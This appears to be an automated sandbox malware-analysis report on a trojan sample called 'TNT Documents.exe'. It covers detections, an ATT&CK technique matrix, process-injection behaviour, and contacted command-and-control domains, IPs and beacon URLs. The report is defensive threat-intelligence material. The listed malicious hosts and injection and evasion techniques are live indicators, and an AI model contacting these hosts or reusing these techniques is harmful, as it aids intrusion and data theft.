          Source: Yara matchFile source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532859 Sample: TNT Documents.exe Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 33 www.viavelleiloes.online 2->33 35 www.projectcentered.com 2->35 37 5 other IPs or domains 2->37 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 11 other signatures 2->51 11 TNT Documents.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\...\TNT Documents.exe.log, ASCII 11->31 dropped 63 Injects a PE file into a foreign processes 11->63 15 TNT Documents.exe 11->15         started        18 TNT Documents.exe 11->18         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 20 explorer.exe 15->20 injected process9 dnsIp10 39 metronixmedical.com 119.18.54.99, 49820, 80 PUBLIC-DOMAIN-REGISTRYUS India 20->39 41 cortepuroiberico.com 51.255.30.106, 49794, 80 OVHFR France 20->41 43 5 other IPs or domains 20->43 53 System process connects to network (likely due to code injection or exploit) 20->53 24 mstsc.exe 20->24         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 24->55 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TNT Documents.exe47%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          TNT Documents.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.TNT Documents.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.TNT Documents.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.TNT Documents.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.TNT Documents.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          coached.info0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fontbureau.comI.TTF0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.sajatypeworks.comus40%Avira URL Cloudsafe
          http://www.coached.info/how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnar0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn90%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/soft0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.founder.c0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.founder.com.cn/cnG0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          www.floridanratraining.com/how6/0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.comx0%Avira URL Cloudsafe
          http://www.metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/slnt0%Avira URL Cloudsafe
          http://www.urwpp.de20%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.fontbureau.comF(0%Avira URL Cloudsafe
          http://www.founder.com.cn/cna0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.coma0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.founder.com.cn/cnaX0%Avira URL Cloudsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.com=0%Avira URL Cloudsafe
          http://www.fontbureau.comcomo?0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/M0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/F0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://www.fonts.comX0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.monotype.0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/.comp0%Avira URL Cloudsafe
          http://www.tiro.comU0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd100%Avira URL Cloudmalware
          http://www.urwpp.der0%Avira URL Cloudsafe
          http://www.fontbureau.como0%URL Reputationsafe
          http://www.zhongyicts.com.cno.0%URL Reputationsafe
          http://www.fontbureau.comals0%URL Reputationsafe
          http://www.tiro.comic0%URL Reputationsafe
          http://www.fontbureau.comitud0%URL Reputationsafe
          http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          metronixmedical.com
          		119.18.54.99
          		truetrue
            		unknown
            www.functionalsoft.com
            		74.208.236.210
            		truefalse
              		unknown
              coached.info
              		34.102.136.180
              		truefalseunknown
              cortepuroiberico.com
              		51.255.30.106
              		truetrue
                		unknown
                www.specialtyplastics.online
                		209.17.116.163
                		truetrue
                  		unknown
                  projectcentered.com
                  		158.69.116.156
                  		truetrue
                    		unknown
                    www.pirosconsulting.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.metronixmedical.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.pentagonpublishers.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.floridanratraining.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.viavelleiloes.online
                            		unknown
                            		unknowntrue
                              		unknown
                              www.cortepuroiberico.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.coached.info
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.projectcentered.com
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.coached.info/how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRdfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    www.floridanratraining.com/how6/true
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRdtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRdtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRdtrue
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.fontbureau.com/designersGTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comI.TTFTNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/?TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/bTheTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers?TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.sajatypeworks.comus4TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cnarTNT Documents.exe, 00000000.00000003.258154475.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258083706.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zhongyicts.com.cn9TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/softTNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.tiro.comTNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designersTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.founder.cTNT Documents.exe, 00000000.00000003.258709539.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258597321.0000000005474000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.goodfont.co.krTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cnGTNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sajatypeworks.comTNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.typography.netDTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn/cTheTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comxTNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/slntTNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.urwpp.de2TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/DPleaseTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Y0TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comF(TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.founder.com.cn/cnaTNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/(TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fonts.comTNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sajatypeworks.comaTNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleaseTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.founder.com.cn/cnaXTNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.urwpp.deTNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267332900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267369494.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264299140.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.sakkal.comTNT Documents.exe, 00000000.00000003.262108739.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262382693.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262663913.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262518900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262298913.0000000005482000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com=TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.fontbureau.com/designerssTNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000B.00000000.339769433.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.319305560.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.302126756.0000000006840000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.apache.org/licenses/LICENSE-2.0TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.comTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.comcomo?TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/MTNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/FTNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/jp/TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.comdTNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fonts.comXTNT Documents.exe, 00000000.00000003.256034110.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256133822.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.255970673.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256207995.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.carterandcone.comlTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlNTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cnTNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/frere-jones.htmlTNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265913845.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265991532.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265846476.0000000005482000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.monotype.TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265384324.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265335700.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.jiyu-kobo.co.jp/.compTNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.tiro.comUTNT Documents.exe, 00000000.00000003.260239394.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.jiyu-kobo.co.jp/TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.urwpp.derTNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fontbureau.comoTNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.zhongyicts.com.cno.TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers8TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.comalsTNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpfalse
